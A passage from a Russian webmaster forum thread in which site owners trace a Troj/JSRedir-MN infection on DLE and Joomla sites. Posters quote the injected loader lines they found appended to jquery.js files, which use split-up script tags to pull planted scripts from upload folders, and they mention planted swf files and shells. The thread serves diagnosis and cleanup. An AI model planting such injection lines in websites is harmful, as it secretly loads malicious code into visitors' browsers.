- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Яндекс нашёл вирус Troj/JSRedir-MN.
Уважаемые форумчане, есть тут специалисты по безопасности, кто поможет найти код?
Тоже обнаружил эту дрянь. Уже не первый раз. Началось примерно месяц назад. Причем "вирус" виден не постоянно, яша сам мне пишет об обнаружении вируса и через день-два пишет что вируса больше нет. DLE сайты 9.7-10.0
Сегодня смотрю - просад по трафу. И снова вирус..
с утра пинал программистов, ничего не нашли...
Нашел подключенную левую js.
На одном сайте была залита в папку со скриптом картинок, на другом залили в uploads DLE сайта. Обе js назывались по-разному, но текст был одинаковым. Подключались они через файл engine/classes/js/jquery.js. В самом конце файла была строка: document.write("<scr"+"ipt src='/uploads/posts/2012-03/stal.js'><"+"/script>");
Текст подключенной js'ки:
Что делает код, кто может понять?
---------- Добавлено 07.11.2013 в 15:29 ----------
Докладываю далее. Найдена swf на тех же двух сайтах. В разных папках.
такой же вирус выстрелил сегодня. не знаю где его искать
---------- Добавлено 07.11.2013 в 21:04 ----------
update: нашел swf в папке 2012/07. Залит был вчера.
Стоит 10.1 лицензия
Ох, таже беда и меня посетила, нашел 2 шелла, но погоду они не сделали
Вот мой скрин:
Я нашел 2 файла js с включением в конце:
;document.write("<scr"+"ipt src='/media/system/js/turkey.js'><"+"/script>");
И поудалял несколько swf. Что теперь просто ждать, когда Яша свой тупой глюк исправит?
harold12, а как ты нашел эти файлы?
harold12, а как ты нашел эти файлы?
в исходном коде, на тех страницах, которые яндекс указал смотрел подключенные яваскрипты.
Всем привет, те же яйца, Яндекс нашёл на сайте вирус Troj/JSRedir-MN, покопался в инете, нашёл что-то про вредоносный код в joomla модуле AutsonSlideShow, а именно файл default.php который лежит в mod_AutsonSlideShow папка tmpl. Удаление помогло буквально на час, сегодня Яша опять кричит что у меня на сайте ЗППП. Есть идеи что делать?
Всем привет, те же яйца, Яндекс нашёл на сайте вирус Troj/JSRedir-MN, покопался в инете, нашёл что-то про вредоносный код в joomla модуле AutsonSlideShow, а именно файл default.php который лежит в mod_AutsonSlideShow папка tmpl. Удаление помогло буквально на час, сегодня Яша опять кричит что у меня на сайте ЗППП. Есть идеи что делать?
насчет слайдера mod_AutsonSlideShow я давно заметил. Все мои сайты, где был этот модуль года пол назад стали считаться зараженными, хотя раньше все Яндекс устраивало